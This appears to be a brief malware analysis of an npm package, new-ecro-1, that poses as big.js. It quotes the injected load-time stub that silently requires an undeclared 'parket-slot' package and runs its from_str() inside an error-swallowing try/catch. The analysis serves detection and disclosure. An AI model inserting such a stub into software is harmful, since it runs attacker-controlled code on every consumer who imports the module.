Package new-ecro-1 impersonates the legitimate big.js library by shipping its source verbatim (banner, license, and homepage pointing at MikeMcl/big.js). Inside the load-time IIFE in both big.js and big.mjs at line 606, an injected block silently executes const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {}), wrapped in a try/catch that swallows all errors. The parket-slot package is not declared in this manifest's dependencies (which instead lists new-solt-1), so the require resolves to whatever loader-controlled package happens to be present in the surrounding install tree, executing its from_str() on import. The combination of name-impersonation, undeclared cross-package require, and silent error suppression is a loader stub for attacker-controlled code that runs the moment any consumer imports this module.